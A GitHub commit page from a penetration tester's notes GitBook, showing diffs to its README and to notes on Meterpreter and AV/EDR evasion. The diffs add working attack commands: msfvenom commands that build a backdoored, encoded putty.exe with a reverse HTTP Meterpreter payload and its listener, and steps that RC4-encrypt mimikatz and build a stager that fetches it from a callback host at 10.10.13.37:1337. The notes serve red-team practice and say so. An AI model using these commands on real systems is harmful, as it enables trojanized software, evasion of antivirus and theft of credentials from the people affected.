Skip to content

Commit

Permalink
[AHK] Automatic update 👽
Browse files Browse the repository at this point in the history
  • Loading branch information
snovvcrash committed Mar 6, 2023
1 parent 0a1b2fd commit 1a9bcdd
Show file tree
Hide file tree
Showing 3 changed files with 13 additions and 6 deletions.
10 changes: 8 additions & 2 deletions README.md
Original file line number Diff line number Diff line change
Expand Up @@ -4,16 +4,22 @@

Hey there!

I'm [snovvcrash](https://snovvcrash.rocks/about) and that's a gitbook for keeping my pentest notes on hand. It's far from being perfect in terms of organization (that's why I call it "promiscuous") and, basically, I'm logging it for myself, but it turned out that hosting it online makes it most convenient to access. So, if you find it handy too, feel free to use it... **responsibly**, of course!
I'm [snovvcrash](https://snovvcrash.rocks/about) and I do ethical penetration testing, red teaming, offensive tooling developement and cybersecurity researching.

This is a GitBook of mine whose purpose is keeping my pentest notes on hand. It's far from being perfect in terms of organization (that's why I call it "promiscuous") and, basically, I'm logging it for myself, but it turned out that hosting it online makes it most convenient to access. So, if you find it handy too, feel free to use it... **responsibly**, of course!

While taking these notes, one main rule is that all the given techniques are actually tested either during a real engagement or in a training lab.

{% hint style="warning" %}
**DISCLAIMER.** All information contained in this blog is provided for educational and research purposes only. The author is not responsible for any illegal use of any information published on the pages of this blog.
{% endhint %}

{% hint style="success" %}
**SUPPORT.** Private pet projects of mine in offensive tooling are available [for my sponsors](https://boosty.to/snovvcrash).
{% endhint %}

{% hint style="info" %}
Previous version of PPN is ➡️ [here](https://snovvcrash.rocks/PPN/) (deprecated).
**DEPRECATED.** The previous version of PPN is right [here](https://snovvcrash.rocks/PPN/).
{% endhint %}

## About
Expand Down
5 changes: 3 additions & 2 deletions pentest/c2/meterpreter.md
Original file line number Diff line number Diff line change
Expand Up @@ -144,8 +144,9 @@ Backdoored legit executable with delayed Stdapi loading:

```
$ wget https://the.earth.li/~sgtatham/putty/latest/w64/putty.exe
$ msfvenom -p windows/x64/meterpreter_reverse_http LHOST=eth0 LPORT=8088 EXITFUNC=thread -e x64/xor_dynamic -i 10 -k -x putty.exe -f exe -o evilputty.exe
$ sudo msfconsole -qx 'use exploit/multi/handler; set PAYLOAD windows/x64/meterpreter_reverse_http; set LHOST eth0; set LPORT 8088; set AutoLoadStdapi false; set EXITFUNC thread; run'
$ msfvenom -p windows/x64/meterpreter_reverse_http LHOST=eth0 LPORT=8080 EXITFUNC=thread -e x64/xor_dynamic -i 10 -k -x putty.exe -f exe -o evilputty.exe
$ sudo msfconsole -qx 'use exploit/multi/handler; set PAYLOAD windows/x64/meterpreter_reverse_http; set LHOST eth0; set LPORT 8080; set AutoLoadStdapi false; set EXITFUNC thread; run'
meterpreter > load stdapi
```


Expand Down
4 changes: 2 additions & 2 deletions pentest/infrastructure/ad/av-edr-evasion/README.md
Original file line number Diff line number Diff line change
Expand Up @@ -335,9 +335,9 @@ mv "C:\Windows\Temp\$target\$obf\bin\Release\$obf.exe" "\\vmware-host\Shared Fol
- [https://github.com/hasherezade/libpeconv](https://github.com/hasherezade/libpeconv)

```
$ git clone --recurse-submodules https://github.com/tothi/stager_libpeconv
$ git clone --recurse-submodules https://github.com/tothi/stager_libpeconv && cd stager_libpeconv
$ openssl enc -rc4 -in mimikatz.exe -K `echo -n '1234567890123456' | xxd -p` -nosalt -out mimikatz.rc4
$ make stager IMPLANT_IP=10.10.13.37 IMPLANT_PORT=1337 RC4_KEY=1234567890123456
$ ./socket_binary_server.py mimikatz.rc4 10.10.13.37 1337
Cmd > stager.exe
Cmd > dist\stager.exe
```

0 comments on commit 1a9bcdd

Please sign in to comment.